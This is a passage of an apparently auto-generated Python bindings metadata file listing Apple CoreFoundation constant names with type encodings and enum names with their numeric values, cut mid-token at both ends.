terRoundingIncrement@^{__CFString=}$kCFNumberFormatterRoundingMode@^{__CFString=}$kCFNumberFormatterSecondaryGroupingSize@^{__CFString=}$kCFNumberFormatterUseGroupingSeparator@^{__CFString=}$kCFNumberFormatterUseSignificantDigits@^{__CFString=}$kCFNumberFormatterZeroSymbol@^{__CFString=}$kCFNumberNaN@^{__CFNumber=}$kCFNumberNegativeInfinity@^{__CFNumber=}$kCFNumberPositiveInfinity@^{__CFNumber=}$kCFPersianCalendar@^{__CFString=}$kCFPreferencesAnyApplication@^{__CFString=}$kCFPreferencesAnyHost@^{__CFString=}$kCFPreferencesAnyUser@^{__CFString=}$kCFPreferencesCurrentApplication@^{__CFString=}$kCFPreferencesCurrentHost@^{__CFString=}$kCFPreferencesCurrentUser@^{__CFString=}$kCFRepublicOfChinaCalendar@^{__CFString=}$kCFRunLoopCommonModes@^{__CFString=}$kCFRunLoopDefaultMode@^{__CFString=}$kCFSocketCommandKey@^{__CFString=}$kCFSocketErrorKey@^{__CFString=}$kCFSocketNameKey@^{__CFString=}$kCFSocketRegisterCommand@^{__CFString=}$kCFSocketResultKey@^{__CFString=}$kCFSocketRetrieveCommand@^{__CFString=}$kCFSocketValueKey@^{__CFString=}$kCFStreamErrorDomainSOCKS@i$kCFStreamErrorDomainSSL@i$kCFStreamPropertyAppendToFile@^{__CFString=}$kCFStreamPropertyDataWritten@^{__CFString=}$kCFStreamPropertyFileCurrentOffset@^{__CFString=}$kCFStreamPropertySOCKSPassword@^{__CFString=}$kCFStreamPropertySOCKSProxy@^{__CFString=}$kCFStreamPropertySOCKSProxyHost@^{__CFString=}$kCFStreamPropertySOCKSProxyPort@^{__CFString=}$kCFStreamPropertySOCKSUser@^{__CFString=}$kCFStreamPropertySOCKSVersion@^{__CFString=}$kCFStreamPropertyShouldCloseNativeSocket@^{__CFString=}$kCFStreamPropertySocketNativeHandle@^{__CFString=}$kCFStreamPropertySocketRemoteHostName@^{__CFString=}$kCFStreamPropertySocketRemotePortNumber@^{__CFString=}$kCFStreamPropertySocketSecurityLevel@^{__CFString=}$kCFStreamSocketSOCKSVersion4@^{__CFString=}$kCFStreamSocketSOCKSVersion5@^{__CFString=}$kCFStreamSocketSecurityLevelNegotiatedSSL@^{__CFString=}$kCFStreamSocketSecurityLevelNone@^{__CFString=}$kCFStreamSocketSecurityLevelSSLv2@^{__CFString=}$kCFStreamSocketSecurityLevelSSLv3@^{__CFString=}$kCFStreamSocketSecurityLevelTLSv1@^{__CFString=}$kCFStringTransformFullwidthHalfwidth@^{__CFString=}$kCFStringTransformHiraganaKatakana@^{__CFString=}$kCFStringTransformLatinArabic@^{__CFString=}$kCFStringTransformLatinCyrillic@^{__CFString=}$kCFStringTransformLatinGreek@^{__CFString=}$kCFStringTransformLatinHangul@^{__CFString=}$kCFStringTransformLatinHebrew@^{__CFString=}$kCFStringTransformLatinHiragana@^{__CFString=}$kCFStringTransformLatinKatakana@^{__CFString=}$kCFStringTransformLatinThai@^{__CFString=}$kCFStringTransformMandarinLatin@^{__CFString=}$kCFStringTransformStripCombiningMarks@^{__CFString=}$kCFStringTransformStripDiacritics@^{__CFString=}$kCFStringTransformToLatin@^{__CFString=}$kCFStringTransformToUnicodeName@^{__CFString=}$kCFStringTransformToXMLHex@^{__CFString=}$kCFTimeZoneSystemTimeZoneDidChangeNotification@^{__CFString=}$kCFURLAddedToDirectoryDateKey@^{__CFString=}$kCFURLApplicationIsScriptableKey@^{__CFString=}$kCFURLAttributeModificationDateKey@^{__CFString=}$kCFURLCanonicalPathKey@^{__CFString=}$kCFURLContentAccessDateKey@^{__CFString=}$kCFURLContentModificationDateKey@^{__CFString=}$kCFURLCreationDateKey@^{__CFString=}$kCFURLCustomIconKey@^{__CFString=}$kCFURLDocumentIdentifierKey@^{__CFString=}$kCFURLEffectiveIconKey@^{__CFString=}$kCFURLFileAllocatedSizeKey@^{__CFString=}$kCFURLFileDirectoryContents@^{__CFString=}$kCFURLFileExists@^{__CFString=}$kCFURLFileLastModificationTime@^{__CFString=}$kCFURLFileLength@^{__CFString=}$kCFURLFileOwnerID@^{__CFString=}$kCFURLFilePOSIXMode@^{__CFString=}$kCFURLFileProtectionComplete@^{__CFString=}$kCFURLFileProtectionCompleteUnlessOpen@^{__CFString=}$kCFURLFileProtectionCompleteUntilFirstUserAuthentication@^{__CFString=}$kCFURLFileProtectionKey@^{__CFString=}$kCFURLFileProtectionNone@^{__CFString=}$kCFURLFileResourceIdentifierKey@^{__CFString=}$kCFURLFileResourceTypeBlockSpecial@^{__CFString=}$kCFURLFileResourceTypeCharacterSpecial@^{__CFString=}$kCFURLFileResourceTypeDirectory@^{__CFString=}$kCFURLFileResourceTypeKey@^{__CFString=}$kCFURLFileResourceTypeNamedPipe@^{__CFString=}$kCFURLFileResourceTypeRegular@^{__CFString=}$kCFURLFileResourceTypeSocket@^{__CFString=}$kCFURLFileResourceTypeSymbolicLink@^{__CFString=}$kCFURLFileResourceTypeUnknown@^{__CFString=}$kCFURLFileSecurityKey@^{__CFString=}$kCFURLFileSizeKey@^{__CFString=}$kCFURLGenerationIdentifierKey@^{__CFString=}$kCFURLHTTPStatusCode@^{__CFString=}$kCFURLHTTPStatusLine@^{__CFString=}$kCFURLHasHiddenExtensionKey@^{__CFString=}$kCFURLIsAliasFileKey@^{__CFString=}$kCFURLIsApplicationKey@^{__CFString=}$kCFURLIsDirectoryKey@^{__CFString=}$kCFURLIsExcludedFromBackupKey@^{__CFString=}$kCFURLIsExecutableKey@^{__CFString=}$kCFURLIsHiddenKey@^{__CFString=}$kCFURLIsMountTriggerKey@^{__CFString=}$kCFURLIsPackageKey@^{__CFString=}$kCFURLIsReadableKey@^{__CFString=}$kCFURLIsRegularFileKey@^{__CFString=}$kCFURLIsSymbolicLinkKey@^{__CFString=}$kCFURLIsSystemImmutableKey@^{__CFString=}$kCFURLIsUbiquitousItemKey@^{__CFString=}$kCFURLIsUserImmutableKey@^{__CFString=}$kCFURLIsVolumeKey@^{__CFString=}$kCFURLIsWritableKey@^{__CFString=}$kCFURLKeysOfUnsetValuesKey@^{__CFString=}$kCFURLLabelColorKey@^{__CFString=}$kCFURLLabelNumberKey@^{__CFString=}$kCFURLLinkCountKey@^{__CFString=}$kCFURLLocalizedLabelKey@^{__CFString=}$kCFURLLocalizedNameKey@^{__CFString=}$kCFURLLocalizedTypeDescriptionKey@^{__CFString=}$kCFURLNameKey@^{__CFString=}$kCFURLParentDirectoryURLKey@^{__CFString=}$kCFURLPathKey@^{__CFString=}$kCFURLPreferredIOBlockSizeKey@^{__CFString=}$kCFURLQuarantinePropertiesKey@^{__CFString=}$kCFURLTagNamesKey@^{__CFString=}$kCFURLTotalFileAllocatedSizeKey@^{__CFString=}$kCFURLTotalFileSizeKey@^{__CFString=}$kCFURLTypeIdentifierKey@^{__CFString=}$kCFURLUbiquitousItemDownloadingErrorKey@^{__CFString=}$kCFURLUbiquitousItemDownloadingStatusCurrent@^{__CFString=}$kCFURLUbiquitousItemDownloadingStatusDownloaded@^{__CFString=}$kCFURLUbiquitousItemDownloadingStatusKey@^{__CFString=}$kCFURLUbiquitousItemDownloadingStatusNotDownloaded@^{__CFString=}$kCFURLUbiquitousItemHasUnresolvedConflictsKey@^{__CFString=}$kCFURLUbiquitousItemIsDownloadedKey@^{__CFString=}$kCFURLUbiquitousItemIsDownloadingKey@^{__CFString=}$kCFURLUbiquitousItemIsUploadedKey@^{__CFString=}$kCFURLUbiquitousItemIsUploadingKey@^{__CFString=}$kCFURLUbiquitousItemPercentDownloadedKey@^{__CFString=}$kCFURLUbiquitousItemPercentUploadedKey@^{__CFString=}$kCFURLUbiquitousItemUploadingErrorKey@^{__CFString=}$kCFURLVolumeAvailableCapacityForImportantUsageKey@^{__CFString=}$kCFURLVolumeAvailableCapacityForOpportunisticUsageKey@^{__CFString=}$kCFURLVolumeAvailableCapacityKey@^{__CFString=}$kCFURLVolumeCreationDateKey@^{__CFString=}$kCFURLVolumeIdentifierKey@^{__CFString=}$kCFURLVolumeIsAutomountedKey@^{__CFString=}$kCFURLVolumeIsBrowsableKey@^{__CFString=}$kCFURLVolumeIsEjectableKey@^{__CFString=}$kCFURLVolumeIsEncryptedKey@^{__CFString=}$kCFURLVolumeIsInternalKey@^{__CFString=}$kCFURLVolumeIsJournalingKey@^{__CFString=}$kCFURLVolumeIsLocalKey@^{__CFString=}$kCFURLVolumeIsReadOnlyKey@^{__CFString=}$kCFURLVolumeIsRemovableKey@^{__CFString=}$kCFURLVolumeIsRootFileSystemKey@^{__CFString=}$kCFURLVolumeLocalizedFormatDescriptionKey@^{__CFString=}$kCFURLVolumeLocalizedNameKey@^{__CFString=}$kCFURLVolumeMaximumFileSizeKey@^{__CFString=}$kCFURLVolumeNameKey@^{__CFString=}$kCFURLVolumeResourceCountKey@^{__CFString=}$kCFURLVolumeSupportsAccessPermissionsKey@^{__CFString=}$kCFURLVolumeSupportsAdvisoryFileLockingKey@^{__CFString=}$kCFURLVolumeSupportsCasePreservedNamesKey@^{__CFString=}$kCFURLVolumeSupportsCaseSensitiveNamesKey@^{__CFString=}$kCFURLVolumeSupportsCompressionKey@^{__CFString=}$kCFURLVolumeSupportsExclusiveRenamingKey@^{__CFString=}$kCFURLVolumeSupportsExtendedSecurityKey@^{__CFString=}$kCFURLVolumeSupportsFileCloningKey@^{__CFString=}$kCFURLVolumeSupportsHardLinksKey@^{__CFString=}$kCFURLVolumeSupportsImmutableFilesKey@^{__CFString=}$kCFURLVolumeSupportsJournalingKey@^{__CFString=}$kCFURLVolumeSupportsPersistentIDsKey@^{__CFString=}$kCFURLVolumeSupportsRenamingKey@^{__CFString=}$kCFURLVolumeSupportsRootDirectoryDatesKey@^{__CFString=}$kCFURLVolumeSupportsSparseFilesKey@^{__CFString=}$kCFURLVolumeSupportsSwapRenamingKey@^{__CFString=}$kCFURLVolumeSupportsSymbolicLinksKey@^{__CFString=}$kCFURLVolumeSupportsVolumeSizesKey@^{__CFString=}$kCFURLVolumeSupportsZeroRunsKey@^{__CFString=}$kCFURLVolumeTotalCapacityKey@^{__CFString=}$kCFURLVolumeURLForRemountingKey@^{__CFString=}$kCFURLVolumeURLKey@^{__CFString=}$kCFURLVolumeUUIDStringKey@^{__CFString=}$kCFUserNotificationAlertHeaderKey@^{__CFString=}$kCFUserNotificationAlertMessageKey@^{__CFString=}$kCFUserNotificationAlertTopMostKey@^{__CFString=}$kCFUserNotificationAlternateButtonTitleKey@^{__CFString=}$kCFUserNotificationCheckBoxTitlesKey@^{__CFString=}$kCFUserNotificationDefaultButtonTitleKey@^{__CFString=}$kCFUserNotificationIconURLKey@^{__CFString=}$kCFUserNotificationKeyboardTypesKey@^{__CFString=}$kCFUserNotificationLocalizationURLKey@^{__CFString=}$kCFUserNotificationOtherButtonTitleKey@^{__CFString=}$kCFUserNotificationPopUpSelectionKey@^{__CFString=}$kCFUserNotificationPopUpTitlesKey@^{__CFString=}$kCFUserNotificationProgressIndicatorValueKey@^{__CFString=}$kCFUserNotificationSoundURLKey@^{__CFString=}$kCFUserNotificationTextFieldTitlesKey@^{__CFString=}$kCFUserNotificationTextFieldValuesKey@^{__CFString=}$kCFXMLTreeErrorDescription@^{__CFString=}$kCFXMLTreeErrorLineNumber@^{__CFString=}$kCFXMLTreeErrorLocation@^{__CFString=}$kCFXMLTreeErrorStatusCode@^{__CFString=}$"""
enums = """$CFByteOrderBigEndian@2$CFByteOrderLittleEndian@1$CFByteOrderUnknown@0$CFNotificationSuspensionBehaviorCoalesce@2$CFNotificationSuspensionBehaviorDeliverImmediately@4$CFNotificationSuspensionBehaviorDrop@1$CFNotificationSuspensionBehaviorHold@3$CF_USE_OSBYTEORDER_H@1$COREFOUNDATION_CFPLUGINCOM_SEPARATE@1$FALSE@0$TRUE@1$kCFBookmarkResolutionWithoutMountingMask@512$kCFBookmarkResolutionWithoutUIMask@256$kCFBundleExecutableArchitectureI386@7$kCFBundleExecutableArchitecturePPC@18$kCFBundleExecutableArchitecturePPC64@16777234$kCFBundleExecutableArchitectureX86_64@16777223$kCFCalendarComponentsWrap@1$kCFCalendarUnitDay@16$kCFCalendarUnitEra@2$kCFCalendarUnitHour@32$kCFCalendarUnitMinute@64$kCFCalendarUnitMonth@8$kCFCalendarUnitQuarter@2048$kCFCalendarUnitSecond@128$kCFCalendarUnitWeek@256$kCFCalendarUnitWeekOfMonth@4096$kCFCalendarUnitWeekOfYear@8192$kCFCalendarUnitWeekday@512$kCFCalendarUnitWeekdayOrdinal@1024$kCFCalendarUnitYear@4$kCFCalendarUnitYearForWeekOfYear@16384$kCFCharacterSetAlphaNumeric@10$kCFCharacterSetCapitalizedLetter@13$kCFCharacterSetControl@1$kCFCharacterSetDecimalDigit@4$kCFCharacterSetDecomposable@9$kCFCharacterSetIllegal@12$kCFCharacterSetLetter@5$kCFCharacterSetLowercaseLetter@6$kCFCharacterSetNewline@15$kCFCharacterSetNonBase@8$kCFCharacterSetPunctuation@11$kCFCharacterSetSymbol@14$kCFCharacterSetUppercaseLetter@7$kCFCharacterSetWhitespace@2$kCFCharacterSetWhitespaceAndNewline@3$kCFCompareAnchored@8$kCFCompareBackwards@4$kCFCompareCaseInsensitive@1$kCFCompareDiacriticInsensitive@128$kCFCompareEqualTo@0$kCFCompareForcedOrdering@512$kCFCompareGreaterThan@1$kCFCompareLessThan@-1$kCFCompareLocalized@32$kCFCompareNonliteral@16$kCFCompareNumerically@64$kCFCompareWidthInsensitive@256$kCFCoreFoundationVersionNumber10_10@1151.16$kCFCoreFoundationVersionNumber10_10_1@1151.16$kCFCoreFoundationVersionNumber10_10_2@1152$kCFCoreFoundationVersionNumber10_10_3@1153.18$kCFCoreFoundationVersionNumber10_10_4@1153.18$kCFCoreFoundationVersionNumber10_10_5@1153.18$kCFCoreFoundationVersionNumber10_10_Max@1199$kCFCoreFoundationVersionNumber10_11@1253$kCFCoreFoundationVersionNumber10_11_1@1255.1$kCFCoreFoundationVersionNumber10_11_2@1256.14$kCFCoreFoundationVersionNumber10_11_3@1256.14$kCFCoreFoundationVersionNumber10_11_4@1258.1$kCFCoreFoundationVersionNumber10_11_Max@1299$kCFDataSearchAnchored@2$kCFDataSearchBackwards@1$kCFDateFormatterFullStyle@4$kCFDateFormatterLongStyle@3$kCFDateFormatterMediumStyle@2$kCFDateFormatterNoStyle@0$kCFDateFormatterShortStyle@1$kCFFileDescriptorReadCallBack@1$kCFFileDescriptorWriteCallBack@2$kCFFileSecurityClearAccessControlList@32$kCFFileSecurityClearGroup@2$kCFFileSecurityClearGroupUUID@16$kCFFileSecurityClearMode@4$kCFFileSecurityClearOwner@1$kCFFileSecurityClearOwnerUUID@8$kCFGregorianAllUnits@16777215$kCFGregorianUnitsDays@4$kCFGregorianUnitsHours@8$kCFGregorianUnitsMinutes@16$kCFGregorianUnitsMonths@2$kCFGregorianUnitsSeconds@32$kCFGregorianUnitsYears@1$kCFISO8601DateFormatWithColonSeparatorInTime@512$kCFISO8601DateFormatWithColonSeparatorInTimeZone@1024$kCFISO8601DateFormatWithDashSeparatorInDate@256$kCFISO8601DateFormatWithDay@16$kCFISO8601DateFormatWithFractionalSeconds@2048$kCFISO8601DateFormatWithFullDate@275$kCFISO8601DateFormatWithFullTime@1632$kCFISO8601DateFormatWithInternetDateTime@1907$kCFISO8601DateFormatWithMonth@2$kCFISO8601DateFormatWithSpaceBetweenDateAndTime@128$kCFISO8601DateFormatWithTime@32$kCFISO8601DateFormatWithTimeZone@64$kCFISO8601DateFormatWithWeekOfYear@4$kCFISO8601DateFormatWithYear@1$kCFLocaleLanguageDirectionBottomToTop@4$kCFLocaleLanguageDirectionLeftToRight@1$kCFLocaleLanguageDirectionRightToLeft@2$kCFLocaleLanguageDirectionTopToBottom@3$kCFLocaleLanguageDirectionUnknown@0$kCFMessagePortBecameInvalidError@-5$kCFMessagePortIsInvalid@-3$kCFMessagePortReceiveTimeout@-2$kCFMessagePortSendTimeout@-1$kCFMessagePortSuccess@0$kCFMessagePortTransportError@-4$kCFNotFound@-1$kCFNotificationDeliverImmediately@1$kCFNotificationPostToAllSessions@2$kCFNumberCFIndexType@14$kCFNumberCGFloatType@16$kCFNumberCharType@7$kCFNumberDoubleType@13$kCFNumberFloat32Type@5$kCFNumberFloat64Type@6$kCFNumberFloatType@12$kCFNumberFormatterCurrencyAccountingStyle@10$kCFNumberFormatterCurrencyISOCodeStyle@8$kCFNumberFormatterCurrencyPluralStyle@9$kCFNumberFormatterCurrencyStyle@2$kCFNumberFormatterDecimalStyle@1$kCFNumberFormatterNoStyle@0$kCFNumberFormatterOrdinalStyle@6$kCFNumberFormatterPadAfterPrefix@1$kCFNumberFormatterPadAfterSuffix@3$kCFNumberFormatterPadBeforePrefix@0$kCFNumberFormatterPadBeforeSuffix@2$kCFNumberFormatterParseIntegersOnly@1$kCFNumberFormatterPercentStyle@3$kCFNumberFormatterRoundCeiling@0$kCFNumberFormatterRoundDown@2$kCFNumberFormatterRoundFloor@1$kCFNumberFormatterRoundHalfDown@5$kCFNumberFormatterRoundHalfEven@4$kCFNumberFormatterRoundHalfUp@6$kCFNumberFormatterRoundUp@3$kCFNumberFormatterScientificStyle@4$kCFNumberFormatterSpellOutStyle@5$kCFNumberIntType@9$kCFNumberLongLongType@11$kCFNumberLongType@10$kCFNumberMaxType@16$kCFNumberNSIntegerType@15$kCFNumberSInt16Type@2$kCFNumberSInt32Type@3$kCFNumberSInt64Type@4$kCFNumberSInt8Type@1$kCFNumberShortType@8$kCFPropertyListBinaryFormat_v1_0@200$kCFPropertyListImmutable@0$kCFPropertyListMutableContainers@1$kCFPropertyListMutableContainersAndLeaves@2$kCFPropertyListOpenStepFormat@1$kCFPropertyListReadCorruptError@3840$kCFPropertyListReadStreamError@3842$kCFPropertyListReadUnknownVersionError@3841$kCFPropertyListWriteStreamError@3851$kCFPropertyListXMLFormat_v1_0@100$kCFRunLoopAfterWaiting@64$kCFRunLoopAllActivities@268435455$kCFRunLoopBeforeSources@4$kCFRunLoopBeforeTimers@2$kCFRunLoopBeforeWaiting@32$kCFRunLoopEntry@1$kCFRunLoopExit@128$kCFRunLoopRunFinished@1$kCFRunLoopRunHandledSource@4$kCFRunLoopRunStopped@2$kCFRunLoopRunTimedOut@3$kCFSocketAcceptCallBack@2$kCFSocketAutomaticallyReenableAcceptCallBack@2$kCFSocketAutomaticallyReenableDataCallBack@3$kCFSocketAutomaticallyReenableReadCallBack@1$kCFSocketAutomaticallyReenableWriteCallBack@8$kCFSocketCloseOnInvalidate@128$kCFSocketConnectCallBack@4$kCFSocketDataCallBack@3$kCFSocketError@-1$kCFSocketLeaveErrors@64$kCFSocketNoCallBack@0$kCFSocketReadCallBack@1$kCFSocketSuccess@0$kCFSocketTimeout@-2$kCFSocketWriteCallBack@8$kCFStreamErrorDomainCustom@-1$kCFStreamErrorDomainMacOSStatus@2$kCFStreamErrorDomainPOSIX@1$kCFStreamEventCanAcceptBytes@4$kCFStreamEventEndEncountered@16$kCFStreamEventErrorOccurred@8$kCFStreamEventHasBytesAvailable@2$kCFStreamEventNone@0$kCFStreamEventOpenCompleted@1$kCFStreamStatusAtEnd@5$kCFStreamStatusClosed@6$kCFStreamStatusError@7$kCFStreamStatusNotOpen@0$kCFStreamStatusOpen@2$kCFStreamStatusOpening@1$kCFStreamStatusReading@3$kCFStreamStatusWriting@4$kCFStringEncodingANSEL@1537$kCFStringEncodingASCII@1536$kCFStringEncodingBig5@2563$kCFStringEncodingBig5_E@2569$kCFStringEncodingBig5_HKSCS_1999@2566$kCFStringEncodingCNS_11643_92_P1@1617$kCFStringEncodingCNS_11643_92_P2@1618$kCFStringEncodingCNS_11643_92_P3@1619$kCFStringEncodingDOSArabic@1049$kCFStringEncodingDOSBalticRim@1030$kCFStringEncodingDOSCanadianFrench@1048$kCFStringEncodingDOSChineseSimplif@1057$kCFStringEncodingDOSChineseTrad@1059$kCFStringEncodingDOSCyrillic@1043$kCFStringEncodingDOSGreek@1029$kCFStringEncodingDOSGreek1@1041$kCFStringEncodingDOSGreek2@1052$kCFStringEncodingDOSHebrew@1047$kCFStringEncodingDOSIcelandic@1046$kCFStringEncodingDOSJapanese@1056$kCFStringEncodingDOSKorean@1058$kCFStringEncodingDOSLatin1@1040$kCFStringEncodingDOSLatin2@1042$kCFStringEncodingDOSLatinUS@1024$kCFStringEncodingDOSNordic@1050$kCFStringEncodingDOSPortuguese@1045$kCFStringEncodingDOSRussian@1051$kCFStringEncodingDOSThai@1053$kCFStringEncodingDOSTurkish@1044$kCFStringEncodingEBCDIC_CP037@3074$kCFStringEncodingEBCDIC_US@3073$kCFStringEncodingEUC_CN@2352$kCFStringEncodingEUC_JP@2336$kCFStringEncodingEUC_KR@2368$kCFStringEncodingEUC_TW@2353$kCFStringEncodingGBK_95@1585$kCFStringEncodingGB_18030_2000@1586$kCFStringEncodingGB_2312_80@1584$kCFStringEncodingHZ_GB_2312@2565$kCFStringEncodingISOLatin1@513$kCFStringEncodingISOLatin10@528$kCFStringEncodingISOLatin2@514$kCFStringEncodingISOLatin3@515$kCFStringEncodingISOLatin4@516$kCFStringEncodingISOLatin5@521$kCFStringEncodingISOLatin6@522$kCFStringEncodingISOLatin7@525$kCFStringEncodingISOLatin8@526$kCFStringEncodingISOLatin9@527$kCFStringEncodingISOLatinArabic@518$kCFStringEncodingISOLatinCyrillic@517$kCFStringEncodingISOLatinGreek@519$kCFStringEncodingISOLatinHebrew@520$kCFStringEncodingISOLatinThai@523$kCFStringEncodingISO_2022_CN@2096$kCFStringEncodingISO_2022_CN_EXT@2097$kCFStringEncodingISO_2022_JP@2080$kCFStringEncodingISO_2022_JP_1@2082$kCFStringEncodingISO_2022_JP_2@2081$kCFStringEncodingISO_2022_JP_3@2083$kCFStringEncodingISO_2022_KR@2112$kCFStringEncodingInvalidId@4294967295$kCFStringEncodingJIS_C6226_78@1572$kCFStringEncodingJIS_X0201_76@1568$kCFStringEncodingJIS_X0208_83@1569$kCFStringEncodingJIS_X0208_90@1570$kCFStringEncodingJIS_X0212_90@1571$kCFStringEncodingKOI8_R@2562$kCFStringEncodingKOI8_U@2568$kCFStringEncodingKSC_5601_87@1600$kCFStringEncodingKSC_5601_92_Johab@1601$kCFStringEncodingMacArabic@4$kCFStringEncodingMacArmenian@24$kCFStringEncodingMacBengali@13$kCFStringEncodingMacBurmese@19$kCFStringEncodingMacCeltic@39$kCFStringEncodingMacCentralEurRoman@29$kCFStringEncodingMacChineseSimp@25$kCFStringEncodingMacChineseTrad@2$kCFStringEncodingMacCroatian@36$kCFStringEncodingMacCyrillic@7$kCFStringEncodingMacDevanagari@9$kCFStringEncodingMacDingbats@34$kCFStringEncodingMacEthiopic@28$kCFStringEncodingMacExtArabic@31$kCFStringEncodingMacFarsi@140$kCFStringEncodingMacGaelic@40$kCFStringEncodingMacGeorgian@23$kCFStringEncodingMacGreek@6$kCFStringEncodingMacGujarati@11$kCFStringEncodingMacGurmukhi@10$kCFStringEncodingMacHFS@255$kCFStringEncodingMacHebrew@5$kCFStringEncodingMacIcelandic@37$kCFStringEncodingMacInuit@236$kCFStringEncodingMacJapanese@1$kCFStringEncodingMacKannada@16$kCFStringEncodingMacKhmer@20$kCFStringEncodingMacKorean@3$kCFStringEncodingMacLaotian@22$kCFStringEncodingMacMalayalam@17$kCFStringEncodingMacMongolian@27$kCFStringEncodingMacOriya@12$kCFStringEncodingMacRoman@0$kCFStringEncodingMacRomanLatin1@2564$kCFStringEncodingMacRomanian@38$kCFStringEncodingMacSinhalese@18$kCFStringEncodingMacSymbol@33$kCFStringEncodingMacTamil@14$kCFStringEncodingMacTelugu@15$kCFStringEncodingMacThai@21$kCFStringEncodingMacTibetan@26$kCFStringEncodingMacTurkish@35$kCFStringEncodingMacUkrainian@152$kCFStringEncodingMacVT100@252$kCFStringEncodingMacVietnamese@30$kCFStringEncodingNextStepJapanese@2818$kCFStringEncodingNextStepLatin@2817$kCFStringEncodingNonLossyASCII@3071$kCFStringEncodingShiftJIS@2561$kCFStringEncodingShiftJIS_X0213@1576$kCFStringEncodingShiftJIS_X0213_00@1576$kCFStringEncodingShiftJIS_X0213_MenKuTen@1577$kCFStringEncodingUTF16@256$kCFStringEncodingUTF16BE@268435712$kCFStringEncodingUTF16LE@335544576$kCFStringEncodingUTF32@201326848$kCFStringEncodingUTF32BE@402653440$kCFStringEncodingUTF32LE@469762304$kCFStringEncodingUTF7@67109120$kCFStringEncodingUTF7_IMAP@2576$kCFStringEncodingUTF8@134217984$kCFStringEncodingUnicode@256$kCFStringEncodingVISCII@2567$kCFStringEncodingWindowsArabic@1286$kCFStringEncodingWindowsBalticRim@1287$kCFStringEncodingWindowsCyrillic@1282$kCFStringEncodingWindowsGreek@1283$kCFStringEncodingWindowsHebrew@1285$kCFStringEncodingWindowsKoreanJohab@1296$kCFStringEncodingWindowsLatin1@1280$kCFStringEncodingWindowsLatin2@1281$kCFStringEncodingWindowsLatin5@1284$kCFStringEncodingWindowsVietnamese@1288$kCFStringNormalizationFormC@2$kCFStringNormalizationFormD@0$kCFStringNormalizationFormKC@3$kCFStringNormalizationFormKD@1$kCFStringTokenizerAttributeLanguage@131072$kCFStringTokenizerAttributeLatinTranscription@65536$kCFStringTokenizerTokenHasDerivedSubTokensMask@4$kCFStringTokenizerTokenHasHasNumbersMask@8$kCFStringTokenizerTokenHasNonLettersMask@16$kCFStringTokenizerTokenHasSubTokensMask@2$kCFStringTokenizerTokenIsCJWordMask@32$kCFStringTokenizerTokenNone@0$kCFStringTokenizerTokenNormal@1$kCFStringTokenizerUnitLineBreak@3$kCFStringTokenizerUnitParagraph@2$kCFStringTokenizerUnitSentence@1$kCFStringTokenizerUnitWord@0$kCFStringTokenizerUnitWordBoundary@4$kCFTimeZoneNameStyleDaylightSaving@2$kCFTimeZoneNameStyleGeneric@4$kCFTimeZoneNameStyleShortDaylightSaving@3$kCFTimeZoneNameStyleShortGeneric@5$kCFTimeZoneNameStyleShortStandard@1$kCFTimeZoneNameStyleStandard@0$kCFURLBookmarkCreationMinimalBookmarkMask@512$kCFURLBookmarkCreationPreferFileIDResolutionMask@256$kCFURLBookmarkCreationSecurityScopeAllowOnlyReadAccess@4096$kCFURLBookmarkCreationSuitableForBookmarkFile@1024$kCFURLBookmarkCreationWithSecurityScope@2048$kCFURLBookmarkResolutionWithSecurityScope@1024$kCFURLBookmarkResolutionWithoutMountingMask@512$kCFURLBookmarkResolutionWithoutUIMask@256$kCFURLComponentFragment@12$kCFURLComponentHost@8$kCFURLComponentNetLocation@2$kCFURLComponentParameterString@10$kCFURLComponentPassword@6$kCFURLComponentPath@3$kCFURLComponentPort@9$kCFURLComponentQuery@11$kCFURLComponentResourceSpecifier@4$kCFURLComponentScheme@1$kCFURLComponentUser@5$kCFURLComponentUserInfo@7$kCFURLEnumeratorDefaultBehavior@0$kCFURLEnumeratorDescendRecursively@1$kCFURLEnumeratorDirectoryPostOrderSuccess@4$kCFURLEnumeratorEnd@2$kCFURLEnumeratorError@3$kCFURLEnumeratorGenerateFileReferenceURLs@4$kCFURLEnumeratorGenerateRelativePathURLs@64$kCFURLEnumeratorIncludeDirectoriesPostOrder@32$kCFURLEnumeratorIncludeDirectoriesPreOrder@16$kCFURLEnumeratorSkipInvisibles@2$kCFURLEnumeratorSkipPackageContents@8$kCFURLEnumeratorSuccess@1$kCFURLHFSPathStyle@1$kCFURLImproperArgumentsError@-15$kCFURLPOSIXPathStyle@0$kCFURLPropertyKeyUnavailableError@-17$kCFURLRemoteHostUnavailableError@-14$kCFURLResourceAccessViolationError@-13$kCFURLResourceNotFoundError@-12$kCFURLTimeoutError@-18$kCFURLUnknownError@-10$kCFURLUnknownPropertyKeyError@-16$kCFURLUnknownSchemeError@-11$kCFURLWindowsPathStyle@2$kCFUserNotificationAlternateResponse@1$kCFUserNotificationCancelResponse@3$kCFUserNotificationCautionAlertLevel@2$kCFUserNotificationDefaultResponse@0$kCFUserNotificationNoDefaultButtonFlag@32$kCFUserNotificationNoteAlertLevel@1$kCFUserNotificationOtherResponse@2$kCFUserNotificationPlainAlertLevel@3$kCFUserNotificationStopAlertLevel@0$kCFUserNotificationUseRadioButtonsFlag@64$kCFXMLEntityTypeCharacter@4$kCFXMLEntityTypeParameter@0$kCFXMLEntityTypeParsedExternal@2$kCFXMLEntityTypeParsedInternal@1$kCFXMLEntityTypeUnparsed@3$kCFXMLErrorElementlessDocument@11$kCFXMLErrorEncodingConversionFailure@3$kCFXMLErrorMalformedCDSect@7$kCFXMLErrorMalformedCharacterReference@13$kCFXMLErrorMalformedCloseTag@8$kCFXMLErrorMalformedComment@12$kCFXMLErrorMalformedDTD@5$kCFXMLErrorMalformedDocument@10$kCFXMLErrorMalformedName@6$kCFXMLErrorMalformedParsedCharacterData@14$kCFXMLErrorMalformedProcessingInstruction@4$kCFXMLErrorMalformedStartTag@9$kCFXMLErrorNoData@15$kCFXMLErrorUnexpectedEOF@1$kCFXMLErrorUnknownEncoding@2$kCFXMLNodeCurrentVersion@1$kCFXMLNodeTypeAttribute@3$kCFXMLNodeTypeAttributeListDeclaration@15$kCFXMLNodeTypeCDATASection@7$kCFXMLNodeTypeComment@5$kCFXMLNodeTypeDocument@1$kCFXMLNodeTypeDocumentFragment@8$kCFXMLNodeTypeDocumentType@11$kCFXMLNodeTypeElement@2$kCFXMLNodeTypeElementTypeDeclaration@14$kCFXMLNodeTypeEntity@9$kCFXMLNodeTypeEntityReference@10$kCFXMLNodeTypeNotation@13$kCFXMLNodeTypeProcessingInstruction@4$kCFXMLNodeTypeText@6$kCFXMLNodeTypeWhitespace@12$kCFXMLParserAddImpliedAttributes@32$kCFXMLParserAllOptions@16777215$kCFXMLParserNoOptions@0$k